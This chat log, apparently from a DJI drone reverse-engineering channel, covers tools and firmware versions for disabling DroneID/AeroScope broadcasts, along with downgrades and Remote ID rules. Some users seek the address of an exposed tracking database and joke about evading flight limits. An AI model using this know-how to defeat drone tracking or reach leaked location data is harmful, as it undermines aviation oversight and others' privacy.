"Every DJI drone automatically transmits AeroScope information; there is no way for a drone user to turn the signal off because that would defeat AeroScope’s purpose of promoting accountable and responsible drone use. ..... **The pilot's location is built into the AeroScope signal and cannot be turned off**"
[2022-08-11 12:53:39]
pequad :
pequad joined the channel.
[2022-08-12 21:51:33]
xou :
Does the dji fpv racer(wm170) also send droneid? Can CIAJeepDoors work with dji fpv?
[2022-08-17 17:48:58]
pingspike :
@speatuk ??
[2022-08-24 00:06:20]
austinc3030 :
austinc3030 joined the channel.
[2022-08-25 06:47:11]
infinitydrones :
infinitydrones joined the channel.
[2022-08-26 06:44:25]
harryemery92 :
harryemery92 joined the channel.
[2022-08-26 07:47:51]
dmtstarpilot :
dmtstarpilot joined the channel.
[2022-08-26 22:31:15]
andysayle :
andysayle joined the channel.
[2022-08-26 23:10:46]
venom-code :
venom-code joined the channel.
[2022-08-27 19:11:26]
hostile :
https://dji-rev.com/dji-rev/pl/3ttgea4xiingjg779anhzn814o
[2022-08-28 11:32:33]
varvar :
varvar joined the channel.
[2022-08-28 18:50:26]
speatuk :
@harryemery92 ??
[2022-08-30 00:17:29]
molten_roll :
molten_roll joined the channel.
[2022-08-30 14:01:09]
hostile :
https://dji-rev.com/dji-rev/pl/dwpzpoytyjbcppksmrswoyygqr
[2022-08-31 10:45:17]
oxolot :
Cool stuff. But recently we are forced to install a version of DJI Fly higher than 1.5.10. It comes with some recent Android 12 updates. DJI Fly 1.5.10 just stopped opening (crashes). Nothing helps except upgrading to newer versions, which revert the privacy mask to 11111111. Any advice on how to deal with that?
[2022-08-31 11:28:02]
kilrah :
Use an old phone...
[2022-08-31 13:29:36]
harryemery92 :
Strange thing is I have a Samsung S10 running Android 12 and DJI Fly 1.5.10 works on that, but it won't on my Samsung S20
[2022-08-31 16:23:30]
oxolot :
Can you please check in your settings -->About phone-->Software information what versions of Google Play system update you have on both - working and non-working phones? I suspect that anything newer than Jan 1 2022 will block use of 1.5.10
[2022-08-31 16:32:09]
adasxdm :
adasxdm joined the channel.
[2022-08-31 18:08:36]
harryemery92 :
Just checked the Samsung s20 plus that says Google play system July 1 2022 and the Samsung s10 Google play system is 1st june 2022
[2022-08-31 18:18:10]
harryemery92 :
I now have Google Play system 1 July 2022 on both the Samsung S20 Plus and the Samsung S10. The Samsung S10 will open the DJI Fly app version 1.5.10 without crashing; the Samsung S20 crashes as soon as you load DJI Fly app 1.5.10. A bit strange
[2022-08-31 18:38:49]
oxolot :
So it is not Google Play... Thanks for checking though. I have the exact same situation with the S20 - July 1st. My DJI Fly started to crash about a week ago for no obvious reason. I don't even update this phone - I always reject if it asks me to agree to something. I don't get it...
[2022-08-31 18:40:28]
oakley75 :
Seems silly, but does clearing the cache do anything? Me being me ha, I'd wipe the partition cache just for shits n giggles
[2022-08-31 18:42:00]
oxolot :
Older phone with new Android (12) works, but newer phone with same Android - does not. What is going on? How old the old phone should be in order to work? :exploding_head:
[2022-08-31 19:15:15]
harryemery92 :
@oxolot have tried all of that, doesn't make any difference
[2022-08-31 19:17:08]
harryemery92 :
Has anyone had any luck running the Open Drone ID apk on Android 12? Modding the map to use Google Maps, as soon as I allow permissions it closes instantly
[2022-08-31 20:50:16]
oxolot :
I have tried that, since sometimes when DJI Fly crashes it suggests clearing the cache. It did not help - it keeps crashing.
[2022-08-31 23:46:52]
fredmicrowave :
I have tried CIAJeepDoor on my M3, It seems to work fine and read the drone config, but there is something weird with it.
This is what it shows, instead of "111111111"
Enabling or disabling makes no difference
[2022-08-31 23:47:31]
fredmicrowave :
Then on the remote, Aeroscope shows as disabled, but if I try to enable it, it gets back to disabled right away
Fly v 1.5.10 , drone is on .655
[2022-09-01 09:28:22]
oxolot :
AFAIK 010111111 is standard value which comes with the drone when we just buy it. .655? Strange number. There are .0500, .0600, .0700, but .655? Is it how it arrived from the store?
[2022-09-01 10:25:12]
cs2000 :
0655 was an internal DJI beta. The notes below are from DDD as I made that FW available to the public as I did not agree with DJI forcing an ARB bump just to get your GPS working again:
This firmware is BETA and was targeted at fixing the GPS Lock-On/Sync issues that affected the MP3 on the previous public firmware build (01.00.0600).
This firmware comes with no release notes from DJI but has been shown to contain all the same fixes and additions as 01.00.0700 BUT doesn't increase the ARB number.
This firmware is being released to the public by DDD as I do not agree with DJI basically saying "if you want your GPS to work, then you need to have an ARB bump" as this clearly limits hacking/modding potential moving forwards.
[2022-09-01 10:42:26]
oxolot :
I see. Thanks for explanation. Interesting. Any idea if we can hide DroneID on this one? On .0700 it is not possible. So actually, maybe this is your problem - since 655 is like 700 except for ARB
[2022-09-01 11:16:24]
fredmicrowave :
Possibly, but it still shows "aeroscope" disabled on the RC screen, except you can't enable it :face_with_rolling_eyes:
And in the Digdat video it should show all "1", but I am not sure on what drone.
655 is really good btw, fast satellite reception even in more difficult conditions.
[2022-09-01 13:44:53]
cs2000 :
@fredmicrowave I'm just passing information on, here's the details of what the privacy bits mean (the X indicates the position, obviously 1 is enabled, 0 is disabled)
[2022-09-01 13:46:52]
cs2000 :
As for 0655 and 0700, as far as my limited abilities go, they're the same apart from the ARB bump, so it may not be 100% compatible. But as I say, limited abilities and no devices to test this on, so cannot confirm
[2022-09-01 13:50:10]
hostile :
https://dji-rev.com/dji-rev/pl/ztpkdwmfwj8q5e5qw9nybutnuh
[2022-09-01 13:51:19]
hostile :
@fredmicrowave the M3 firmware with GPS fixes does not work with CIAJD. It was among the first firmware in which they disabled the DUML commands.
[2022-09-01 14:06:15]
cs2000 :
Cheers for the confirmation @hostile :thumbsup:
[2022-09-01 14:26:54]
fredmicrowave :
Interesting, thanks @cs2000 and @hostile
[2022-09-01 14:27:40]
fredmicrowave :
So that would be hide unknown and uuid .
[2022-09-01 14:29:03]
fredmicrowave :
I could always roll back but i like the gps fix...
[2022-09-01 14:52:04]
fredmicrowave :
Interesting that I cannot add uuid any more (not that I want to) but I wonder how DJI fixed that, probably in more recent Fly App versions.
[2022-09-01 18:28:24]
pve :
pve joined the channel.
[2022-09-01 21:18:11]
oxolot :
This Aeroscope thing in the software menu has nothing to do with the state of the bits which we are changing with the DUML command. The only thing we learned is that if you enter that part of the menu (Safety), the bits revert from zeroes to ones even if you do nothing there.
[2022-09-01 21:28:52]
quad808 :
and sneaky DJI strikes again....
[2022-09-02 02:22:30]
fredmicrowave :
That's good to know, and disgusting from DJI.
Does that occur with earlier firmware versions too, or just from 655 on ?
[2022-09-02 09:34:47]
oxolot :
All of them
[2022-09-02 10:39:42]
cs2000 :
yeah, it should be all of them. Any of the beta FW targeted at fixing the GPS sync issues had that DUML command removed
[2022-09-02 11:08:44]
fredmicrowave :
Ok, thanks !
[2022-09-02 12:21:00]
capra_vecinului :
Hello everyone! Been away from the drone world, due to my Mavic Pro being sick for over a year (gimbal malfunction). Meanwhile I found out by chance that there are also other third party guidance apps for our DJI drones, for example “Maven”. Apart from Litchi, which is quite old, what other third party apps would you recommend? I’m using iOS; so Android apps would not help in my case.
[2022-09-04 16:20:45]
h_marshall :
Hey people
I have the same issue as @fredmicrowave with disabling droneid on Mavic 3 and 0700.
Sorry for stupid question, but is it possible to downgrade Mavic 3, maybe with DUMLdore?
[2022-09-04 18:48:35]
fredmicrowave :
Not with 0700 afaik, since it is the first of the versions that has antirollback enabled.
[2022-09-05 16:39:02]
geek2009 :
geek2009 joined the channel.
[2022-09-06 11:08:24]
speatuk :
Thank you so much for this @bin4ry ?
I haven't tried this on my DJI FPV yet, just not got round to it. Has anyone tried it and does it work? Many thanks in advance ??
[2022-09-06 15:10:07]
speatuk :
Just to add to my previous post, yes this does work with the DJI FPV
[2022-09-06 19:36:47]
loaderbull :
Same on Air 2S, just ran the .exe and selected com port. Disabled. Rebooted drone. Still disabled. Good times.
[2022-09-06 21:37:08]
quad808 :
Just to be sure, I would run a check again after connecting to DJI FLY....never can tell with DJI nowadays
[2022-09-07 08:59:00]
speatuk :
Why would I connect to the fly app. Not been connected to that app since I got the DH export.
?
[2022-09-07 16:49:30]
loaderbull :
The FPV is something that can run without it, isn't it? The Air 2S isn't. Hence Quad's statement I assume (unless Litchi is used obvs).
[2022-09-08 00:49:53]
enk2022 :
Hey all
[2022-09-08 00:54:18]
enk2022 :
I was just wondering, is there anything like a DroneID packet in Lightbridge based drones similar to OcuSync? and is DroneID packet the only way to transmit the telemetry/GPS of a drone or is it being sent in other packets as well?
[2022-09-08 21:04:43]
nopexecutor :
not sure about lightbridge. In ocusync also some other packets, from the encrypted part of communication, contain similar info like DroneID packets
[2022-09-09 07:21:22]
harryemery92 :
Has anyone used this https://github.com/dronetag/drone-scanner
[2022-09-09 19:02:24]
uawaa :
uawaa joined the channel.
[2022-09-09 19:22:35]
uawaa :
I have access to DJI Aeroscope stationary version with 4 antennas, is there anything I can do to contribute?
[2022-09-09 19:23:19]
uawaa :
Meanwhile is there a way to downgrade Mavic 3 from 1.00.0700 to get the DUML working again?
[2022-09-09 19:27:49]
uawaa :
The Aeroscope requires internet connection to verify the ssl cert to be able to use it, but because it uses dji assistant for aeroscope, it opens a websocket and there is an API available even when it's offline
[2022-09-09 19:29:45]
uawaa :
And I was told that there have not been any updates for the software for over 2 years now, so they are using the same legacy droneID even for new drones
[2022-09-09 19:32:15]
uawaa :
Last year talking with a DJI representative they told that they are going to stop selling Aeroscope detectors (within a couple of years) and focus on drone market instead of anti-drone market because the latter has developed so much that their product is no longer the best
[2022-09-10 10:43:54]
pingspike :
@uawaa that ties in with my experiences last week when I tried to buy an AeroScope Mobile from a DJI outlet in the UK. Their response:
[2022-09-10 18:13:04]
d95gas :
https://www.heliguy.com/products/rental-dji-aeroscope-mobile
[2022-09-10 18:13:29]
d95gas :
£749 per week to rent it :-)
[2022-09-10 20:48:57]
pve :
I tried the original app https://github.com/opendroneid/receiver-android from which it's derived. Nothing caught - of course, DJI broadcasting is completely different from OpenDroneID. OpenDroneID can be received by anyone with a Bluetooth/WiFi device, but DJI DroneID can only be received by those who bought Aeroscope.
[2022-09-11 11:44:47]
tissy :
I believe that newer DJI models, such as the Mavic Mini 3, do transmit OpenDroneID alongside Aeroscope transmissions in countries such as Japan that have now mandated it.
[2022-09-11 15:21:59]
pve :
Yes, maybe, I'm not sure if the Japanese DroneID is the same as OpenDroneID. I've mini-2 with older firmware (and don't plan any firmware update, of course) :)
[2022-09-13 20:17:02]
quad808 :
What would be great to have is a list of drones and CIA Jeepdoors compatibility list....verified by someone who actually has access to an Aeroscope. Drone and firmware version. Did anyone do this yet?
[2022-09-13 21:07:31]
tissy :
I am hoping to undertake this task next week. This will include which FW version it has been tested against.
[2022-09-15 09:38:15]
urca87 :
urca87 joined the channel.
[2022-09-16 16:46:02]
enigma2 :
anybody knows which firmware of P4Pv2/ Mavic Pro has activated DroneID? or it was already activated from the beginning? (for Leadcore DSP firmware comparison) .
[2022-09-16 16:48:01]
enigma2 :
and is there any ceva toolkit installation file?
[2022-09-16 22:46:13]
tissy :
I believe RemoteID was activated from the beginning, ie from the production line.
[2022-09-17 06:39:05]
sambuko :
How to check if ciajeepdoors work without Aeroscope?
[2022-09-17 07:22:42]
enigma2 :
Checking the flags, disabled or enabled. It has been tested. It worked on AS Mobile!
[2022-09-18 18:09:27]
capra_vecinului :
I might be mistaken, but 700 was the last firmware of Mavic Pro without DroneID. I am on 700, checked with Jeep Door and it shows no ID.
[2022-09-21 17:15:52]
ihackftw :
ihackftw joined the channel.
[2022-09-22 17:20:40]
foriequals0 :
foriequals0 joined the channel.
[2022-09-23 03:14:19]
enk2022 :
anyone happened to know what scrambler lightbridge downlink is using?
[2022-09-23 03:14:33]
enk2022 :
if any
[2022-09-23 03:19:45]
enk2022 :
or at least some idea how I can find it
[2022-09-23 09:07:34]
asae2207 :
asae2207 joined the channel.
[2022-09-23 16:59:12]
proto :
The uplink definitely uses a scrambler, so I would assume the downlink does too
[2022-09-23 23:02:35]
enk2022 :
Thank you @proto for confirming this. Do you know how you can find the scrambling code for uplink or downlink?
[2022-09-24 09:46:22]
skyninja :
wasn't it based on wimax? what scrambler is used by wimax?
[2022-09-24 15:34:28]
fredmicrowave :
I found this very useful to help understanding or extract information, it was used to get video from Falcon9 rockets telemetry, for example :
https://github.com/altillimity/SatDump
[2022-09-25 17:22:33]
proto :
I don't recall. One of the tricks we played was to RE the board and inject our own payloads. That allowed us to send walking bit patterns and track where bits ended up.
[2022-09-26 01:11:26]
jackmax :
jackmax joined the channel.
[2022-09-26 10:00:25]
chrboesch :
chrboesch joined the channel.
[2022-09-26 19:16:38]
fastload :
fastload joined the channel.
[2022-09-27 08:00:46]
w0h :
Hi, does anyone know if DJI used Bluetooth or WiFi to implement the Japanese RID regulations in the Mini 2 and Air 2S updates?
[2022-09-28 23:07:59]
andrej :
andrej joined the channel.
[2022-09-29 09:44:10]
wdesign :
wdesign joined the channel.
[2022-09-29 09:53:37]
sertyz :
sertyz joined the channel.
[2022-10-03 20:00:39]
alt.nq-5711k93 :
alt.nq-5711k93 joined the channel.
[2022-10-04 06:38:50]
itismo :
itismo joined the channel.
[2022-10-04 07:45:17]
xiaohuge365 :
lixuans joined the channel.
[2022-10-04 07:49:02]
xiaohuge365 :
This file is the maintenance manual for the DJI agricultural drone T20
[2022-10-04 07:55:31]
xiaohuge365 :
This file is the maintenance manual for the DJI agricultural drone T16
[2022-10-04 07:56:57]
xiaohuge365 :
Agricultural users, I recommend following this site: djiag.com
[2022-10-04 07:57:26]
xiaohuge365 :
Agricultural users, I recommend following this site: [djiag.com](url)
[2022-10-04 07:58:08]
xiaohuge365 :
Agricultural users, I recommend following this site: [DJI Agriculture]( djiag.com)
[2022-10-04 23:25:00]
itismo :
0600 is where the GPS is fixed and still works with CIAJD
[2022-10-05 07:53:46]
cs2000 :
Sorry, that is incorrect. 01.00.0600 was the last public attempt at the GPS fix issue. FW 01.00.0606 through to 01.00.0655 were beta/internal test releases, released almost on a daily schedule, which were aimed at fixing the GPS issue for good.
01.00.0600 is better than the FW that came before it, but it still wasn't truly fixed; many many owners were still complaining about slow GPS lock times.
These GPS issues were finally fixed on 0655 and DJI released 01.00.0700 to the public with GPS fully working and an ARB bump too.
I know this as I was working alongside someone who was receiving Beta FW directly from DJI during this testing phase.
[2022-10-05 20:22:45]
sambuko :
I offer a new challenge: "share dji dealers documents". The next one, I hope, will be VPN :smiley:
[2022-10-06 04:59:06]
sambuko :
Please don't write to me directly about VPN. I don't have VPN. Even if it becomes available, I will not share it. Besides, as far as I know, VPN is updated every week.....
[2022-10-06 19:14:54]
sambuko :
does ciajeepdoors support mavic 3? i checked on .400 firmware. It works
[2022-10-06 21:27:44]
sambuko :
Are there any solutions to create a copy of the aeroscope?
[2022-10-07 09:47:23]
ustinovmihail98 :
ustinovmihail98 joined the channel.
[2022-10-07 12:21:27]
papalegba :
papalegba joined the channel.
[2022-10-11 16:51:37]
tissy :
Has DJI intentionally cleared down the "product type" JSON within the com.dji.areoscope folder of Aeroscope portable units?
All drones being detected are now 'NewDrone_XX', so there is no definition lookup table.
Anyone able to confirm if their mobile unit is the same please?
The 'Product' file is now just 2 bytes containing {}
[2022-10-11 18:15:43]
the_lord :
confirmed, once connected to the internet the file updated to 2 bytes
[2022-10-11 18:33:50]
tissy :
Hmmmm, wonder if that is intentional or a bug.
[2022-10-11 22:17:31]
the_lord :
most probably its a bug
[2022-10-11 22:58:13]
enk2022 :
yes new drones are detected as NewDrone_XX
[2022-10-11 23:02:23]
tissy :
ALL drones are being detected as NewDrone_XX @enk2022 as the definition / product JSON file appears to have been wiped. The web link where this file was hosted on DJI servers now relates to something else.
[2022-10-12 07:52:04]
cs2000 :
Hmm, wonder if this is a bug, an oversight, or whether there will be a new FW released with a new URL for the JSON lookup file
[2022-10-12 12:42:19]
r99bbit :
r99bbit joined the channel.
[2022-10-13 08:50:22]
woveniy992 :
woveniy992 joined the channel.
[2022-10-14 08:09:30]
sparkyws :
sparkyws joined the channel.
[2022-10-14 08:21:26]
hackdji :
hackdji joined the channel.
[2022-10-14 08:25:16]
fabyo :
fabyo joined the channel.
[2022-10-14 08:30:12]
loveyou :
loveyou joined the channel.
[2022-10-14 15:10:16]
cr :
k1 joined the channel.
[2022-10-14 19:55:13]
cr :
Any have answer in new fw for Mavic 3?
[2022-10-14 20:05:57]
dereksynkopa :
dereksynkopa joined the channel.
[2022-10-14 21:40:07]
andrej :
https://github.com/proto17/dji_droneid
[2022-10-15 04:28:51]
bugalaws :
bugalaws joined the channel.
[2022-10-15 12:34:35]
dilili :
dilili joined the channel.
[2022-10-15 18:13:31]
h_marshall :
Does anybody have experience of using CIAJD on Matrice M30T with 04.01.0020?
I see it was released 2022.06.20 so DJI possibly could disable DUML commands on this fw.
[2022-10-16 11:12:28]
mizyazya :
mizyazya joined the channel.
[2022-10-16 17:34:36]
jaanuke :
jaanuke joined the channel.
[2022-10-16 21:02:25]
asdrol :
asdrol joined the channel.
[2022-10-17 03:47:49]
poohtocs :
poohtocs joined the channel.
[2022-10-17 06:02:30]
enk2022 :
anyone has access to DJI's lightbridge patent?
[2022-10-17 12:35:44]
orvillep0pc0rnwright :
orvillep0pc0rnwright joined the channel.
[2022-10-17 12:47:59]
orvillep0pc0rnwright :
anyone got the IP of the 54.5GB AeroScope DB exposure?
[2022-10-17 12:48:54]
dkovar :
It has been closed. Now, is it somewhere else?
[2022-10-17 12:49:49]
orvillep0pc0rnwright :
ah. this https://cybernews.com/privacy/dji-drone-tracking-data-exposed-in-us/ was last updated Oct 17th but didnt mention it was closed, wondered if still open.
if the 54.5GB db is somewhere else also interested
[2022-10-17 12:52:15]
dkovar :
The vendor was notified by AWS of the breach. I'm fairly certain that the vendor took the appropriate action.
Did anyone else find it while it was open? What did the research firm do with it?
[2022-10-17 12:53:16]
orvillep0pc0rnwright :
> Since the server was hosted on AWS and didn’t have any domains assigned to it, it was impossible for our researchers to track down the owner even with the help of VirusTotal, Centralops Domain dossier, nmap, and dig, among other useful open-source-intelligence (OSINT) tools. Cybernews informed both DJI and AWS about the leaky database for them to fix the issue as soon as possible to reduce the risk of threat actors accessing the dataset. AWS said it had passed our “security concern on to the specific customer for their awareness and potential mitigation.”
https://cybernews.com/privacy/dji-drone-tracking-data-exposed-in-us/
"Cybernews Research Team"
[2022-10-17 22:52:02]
nickphx :
nickphx joined the channel.
[2022-10-18 09:59:41]
asdrol :
hello! has someone tested the cia jeep doors with avata? I'm trying to use it but I can't get it to work. I am able to see the drone listed on testlibusb but when I try to connect in bulk mode it says there is no drone
[2022-10-18 10:00:45]
asdrol :
and comm_serialtalk doesn't show any message in bulk mode
[2022-10-19 04:29:53]
bugalaws :
guys, does someone have the firmwares to erase the 40011 error??
[2022-10-20 15:57:10]
creased :
creased joined the channel.
[2022-10-21 14:55:45]
kil191 :
kil191 joined the channel.
[2022-10-25 20:53:50]
venom-code :
CIAjeepDoors showed my id already disabled without any intervention from my end as such
[2022-10-26 07:17:01]
tissy :
What drone platform is this on please?
[2022-10-27 01:46:09]
il1oo0 :
What's your aircraft model
[2022-10-27 06:55:59]
crashing_bird :
crashing_bird joined the channel.
[2022-10-27 11:59:16]
venom-code :
its the MP1
[2022-10-27 20:57:27]
cs2000 :
Some early MP1 firmware versions don't have drone ID enabled, so it would show as disabled :) I think 0700 was the last one without the code in there, could be wrong though, that's a very old discussion topic :) (still the only drone I've kept over all these years!)
[2022-10-28 03:37:19]
n1co :
n1co joined the channel.
[2022-10-28 11:42:51]
suhas :
suhas joined the channel.
[2022-10-29 08:59:25]
zboson :
zboson joined the channel.
[2022-10-29 17:16:59]
bojangles :
bojangles joined the channel.
[2022-10-30 03:06:30]
bitbangingbytes :
hash joined the channel.
[2022-10-30 06:54:41]
bob.alki :
bob.alki joined the channel.
[2022-10-30 21:44:29]
nmikus :
@0bswervant
[2022-10-30 21:45:19]
nmikus :
Anyone know, is this different from aeroscope?
[2022-11-02 03:36:52]
bitbangingbytes :
RemoteID?
[2022-11-02 16:09:48]
digdat0 :
Hearing of errors on mavic 3 after update with DroneID. Is this the future of DroneID? unable to broadcast == no takeoff?
[2022-11-02 17:02:13]
konraditurbe :
Jesus Christ
[2022-11-02 20:22:06]
hostile :
hehe sorry bout that.
[2022-11-02 20:38:40]
konraditurbe :
DJI: *introduces new bugs so they can ship more FW updates to comply with FCC*
[2022-11-02 21:26:06]
fredmicrowave :
A drone that flies when it wants, or network being mandatory? Time to drop DJI.
[2022-11-02 21:28:24]
konraditurbe :
who wants to poke at autel next year
[2022-11-03 07:30:23]
papalegba :
It sounds like they did what Kevin asked them to do.
[2022-11-03 07:30:50]
papalegba :
What firmware version is this?
[2022-11-03 11:53:25]
joonas :
it happened: I heard from a retailer that M3s are now shipping with a new FW that blocks CIAJeepDoors from the factory. meaning our friends in UA with their project Olga are shit outta luck.
[2022-11-03 14:54:26]
uskve :
> "are shit outta luck."
Don't think so. The way the conflict is going it's going to last for years, so patching this hole just means interested parties need to find other things to poke at. It's a constantly evolving game. It's just going to advance to a new level: ogs already owned the previous one..
Never forget that what might seem morally OK in a warzone could also be done by others in cities; it's a hard path to walk and be responsible with information disclosure while at the same time forcing manufacturers to *care*.
[2022-11-03 16:14:45]
joonas :
oh I'm sure new exploits will emerge eventually. just wanted to spread the word regarding shipments from the factory, because many of the people working on it are in this very channel.
[2022-11-03 19:04:25]
papalegba :
This is well-known info, ever since firmware 700 shipped. And it’s my personal mission to make sure my friends in UA are successful. Their drones, anyway. And I’m making decent progress.
[2022-11-03 19:36:49]
nmikus :
Your goal is finding another way to disable aeroscope?
[2022-11-03 20:41:48]
papalegba :
That and enabling homebrew software on the drone.
[2022-11-03 23:09:06]
konraditurbe :
Yeah this is a bad situation, I told Ukrainians in the front who flew Mavic3 to always use a tablet with airplane mode on and no location on DJI Fly 1.2.0, set the quad at least 100m away from where they are, turn it on and go back to the position. And also land far away. That way at least only the Aircraft position is revealed and not the RC position.
[2022-11-03 23:31:00]
azerbaijan :
Good that dji not calculate approximate rc location by distance according to signal strength and accelerometer/compass data.
[2022-11-04 03:19:23]
nmikus :
AS originates in the FC I assume, have you found where this is? And if so is the FC code section RW?
[2022-11-04 12:04:36]
skyninja :
I captured a wifi beacon frame from a Mavic 3. It is different from the DJI drone id messages in a beacon frame of, for instance, a Mavic Mini. It also does not seem like the FAA/EU direct remote id. Does anybody know what it is? I redacted the screenshot, because it is a packet I captured in the wild, it is not my drone, so I want to protect that person's privacy.
[2022-11-04 15:55:04]
fredmicrowave :
I really don't see the point of poking DJI constantly so they have to tighten their security up to a point where we are not able to use a drone normally.
[2022-11-05 21:56:17]
uskve :
point is the "we". it includes guys who think putting drones within 20 meters of a transport airplane is "cool" / "normal".
[2022-11-05 21:57:39]
uskve :
Some morons can't even handle minimal responsibility
[2022-11-06 13:04:47]
fredmicrowave :
That's true, however it sounds like whining to the "cops" or the boss when you see someone else trying to break a rule, and that's something I hate.
[2022-11-07 10:55:12]
azerbaijan :
Some morons drive drunk, so why does a car let the engine start without an alcohol test?
[2022-11-07 14:13:00]
tmbinc :
Road Traffic Regulations are a.) mature, b.) well-known, c.) widely enforceable, and d.) have mostly public support/acceptance.
Drone laws, however, are still wild-west (there's not a single answer for ~90% of the land around me of whether I'm allowed to fly there or not, even though Europe and especially Germany tends to over- and not underregulate), are not obvious (no signs etc.). Enforcement is not consistent, creating further confusion, and people have _very_ different ideas on how it should be.
So, I don't think this is comparable _at all_.
[2022-11-07 14:14:21]
tmbinc :
I, for one, would love to have very clear no-fly rules. Find an area that's clear and you'd have the right to fly, without risk that someone feels bothered. I'd take that any minute over the gray-area crap we're in today.
[2022-11-07 14:14:31]
tmbinc :
Even if it greatly increases NFZs
[2022-11-07 14:15:34]
tmbinc :
Of course all of this is totally irrelevant for war zones.
[2022-11-07 17:33:53]
konraditurbe :
US FAA implementation isn't half bad, rules are pretty clear, zones are defined in b4ufly app. But yes, here in EU it's a mess.
[2022-11-07 17:34:24]
konraditurbe :
I just hope I never get caught lol
[2022-11-07 17:35:12]
konraditurbe :
dilemma: fly over 120m to avoid ground bystander from listening to prop noise || obey 120m ceiling, chances of getting caught are higher.
[2022-11-07 17:36:27]
nz-maori :
Be aware, new version of Maven for DJI Drones (3.11.6) enables DroneID again (3.11.5 did not)
[2022-11-07 18:06:58]
tissy :
Any suggestion on how I can test the RemoteID from a DJI in the UK as by default, it’s not turned on. Don’t really fancy a day trip to Europe either.
[2022-11-07 18:07:44]
mavic2reverser :
I’d really like to see more standardization in remote ID implementations. It doesn’t make sense to me that it’s up to the manufacturer to come up with their own way to meet compliance, just creates fragmentation. Also, why not just extend adsb?
[2022-11-07 18:08:14]
mavic2reverser :
Maybe these are dumb questions and someone can help explain :)
[2022-11-07 22:47:05]
dkovar :
Remote ID is a standard and is not up to the manufacturer.
Adding a few hundred thousand drones to the ADS-B system would have overwhelmed the infrastructure. It was considered.
[2022-11-08 04:03:38]
mavic2reverser :
The packet format is standard?
[2022-11-08 18:48:51]
skyninja :
ASTM F3411 Remote ID standard and the ASD-STAN prEN 4709-002 Direct Remote ID standard.
[2022-11-08 20:50:52]
jamesmorez23 :
jamesmorez23 joined the channel.
[2022-11-08 21:55:58]
mavic2reverser :
thank you @dkovar and @skyninja ! :)
[2022-11-08 22:12:17]
enk2022 :
Is there anything called Ocusync Enterprise, and how does this differ from the other Ocusync versions?
[2022-11-08 23:25:55]
mavic2reverser :
Yes there’s an enterprise version and I believe a major difference is the ability to use multiple controllers for hand off and payload controlling (cameras)
[2022-11-08 23:26:26]
mavic2reverser :
I’m not too familiar though as I don’t have any enterprise drones to play with
[2022-11-09 07:16:06]
xiaohuge365 :
You're acting like a moron.
[2022-11-09 13:13:21]
djifans :
djifans joined the channel.
[2022-11-10 17:18:24]
sharptak :
sharptak joined the channel.
[2022-11-11 13:09:39]
jorron :
jorron joined the channel.
[2022-11-11 15:23:08]
vernon :
vernon joined the channel.
[2022-11-13 06:56:59]
itismo :
Hi, I am wondering why I do not see anything in droneid apps like "Drone Scanner" on Android with both my Mavic 3 and Mavic Air 2 with droneid on or off
[2022-11-13 06:58:13]
itismo :
Also is the broadcasted info from droneid or Aeroscope used by drone jammers to locate the exact position of the drone in the sky or do they detect it via radar ?
[2022-11-13 07:52:37]
cr :
Hello everyone, I have a question for the authors: has anyone heard of a firmware from Dubai for Mavic 3 with a thermal imager and neo-boosters, which is more stable against radio electronic warfare?
[2022-11-13 08:16:30]
tissy :
What country are you in?
[2022-11-13 08:20:17]
pingspike :
@itismo is your phone / device on the compatibility list?
[2022-11-13 10:00:59]
itismo :
tried 3 phones one of them is Pixel 2 XL which is on the list
[2022-11-13 10:01:37]
itismo :
i am on 0600 FW M3
[2022-11-13 10:38:28]
ref_iw :
ref_iw joined the channel.
[2022-11-14 02:29:17]
itismo :
Does the country make a difference on whether the drone broadcasts or not?
[2022-11-14 03:03:08]
nmikus :
There is a Japanese version though I am not clear on what the difference is
[2022-11-14 04:39:45]
itismo :
Japanese version of what?
[2022-11-14 05:10:55]
itismo :
So, in practice, if I am on a safe firmware that allows turning off remote ID bits then I am safe from both aeroscope and remote ID? they both are affected by same bits?
[2022-11-14 05:11:58]
itismo :
Also if I am using dronescanner app with the privacy bits turned off, what should I see in opendroneID apps?
[2022-11-14 06:04:34]
nmikus :
RemoteID
[2022-11-14 06:06:58]
nmikus :
Aeroscope==RemoteID and yes, if you are using a FW that supports cia jeep doors you should be safe
[2022-11-14 12:02:49]
joonas :
as far as I understand that's not quite right. in the general sense yes. but now DJI is adding country specific remoteid implementations in addition to Aeroscope, which was their own standard. afaik none of the firmwares that support e.g. the Japanese or US remoteid specific stuff also support the privacy bits.
[2022-11-14 14:36:17]
dkovar :
I do not think that Aeroscope fully equals RemoteID. I'd not count on it, at least.
[2022-11-14 19:31:46]
alexmod777 :
alexmod777 joined the channel.
[2022-11-15 06:58:32]
itismo :
I just wanted to confirm if turning off privacy bits also disables remoteid in addition to aeroscope
[2022-11-15 10:11:14]
tmbinc :
Is there firmware that still supports turning off privacy bits but at the same time support remoteid? (I guess old Mavic3 FW maybe?)
[2022-11-15 12:14:31]
joonas :
as far as I know the remoteid updated firmwares only appeared after e.g. the mavic 3 had been patched, for Japan and the US. might be wrong though.
[2022-11-16 06:08:57]
itismo :
we'll see, till now I am very happy with the 0600 firmware
[2022-11-16 08:09:52]
itismo :
Just wish there would be NFZ unlock for it
[2022-11-18 22:11:03]
xchipx :
xchipx joined the channel.
[2022-11-18 22:15:29]
xchipx :
Hi friends, I have just bought a Mini 3 Pro today. I used the GUI version of ciajeepdoors to try to disable drone ID but it still remains. The thing is, my firmware is old, May 2022. In theory, it should work?? thank you
[2022-11-18 22:28:31]
xchipx :
(my mini3 is not yet activated)
[2022-11-19 19:45:10]
anton_anton :
anton_anton joined the channel.
[2022-11-19 20:13:38]
plugandplaytor :
plugandplaytor joined the channel.
[2022-11-22 13:34:28]
john.kairos :
john.kairos joined the channel.
[2022-11-22 16:17:37]
tipev77733 :
tipev77733 joined the channel.
[2022-11-22 23:06:20]
xchipx :
I'm going to guess from the silence that it's not possible to disable remoteid/droneid on Mini 3s..
[2022-11-23 06:39:47]
itismo :
How do you know it's not disabled? What version of DJI Fly do you use?
[2022-11-23 13:48:49]
lpaul :
lpaul joined the channel.
[2022-11-26 13:57:35]
wera33 :
wera33 joined the channel.
[2022-11-30 05:06:40]
sambuko :
Which mavic 3 firmware support Drone id removing?
[2022-12-02 01:35:59]
il1oo0 :
It's possible to disable droneID on MINI3
[2022-12-02 07:27:32]
oxolot :
How?
[2022-12-02 09:01:19]
xenoho4122 :
xenoho4122 joined the channel.
[2022-12-04 15:20:41]
spectrrr30 :
spectrrr30 joined the channel.
[2022-12-05 01:34:35]
zy1004 :
zy1004 joined the channel.
[2022-12-05 08:25:27]
prettymuchathrowaway69 :
prettymuchathrowaway69 joined the channel.
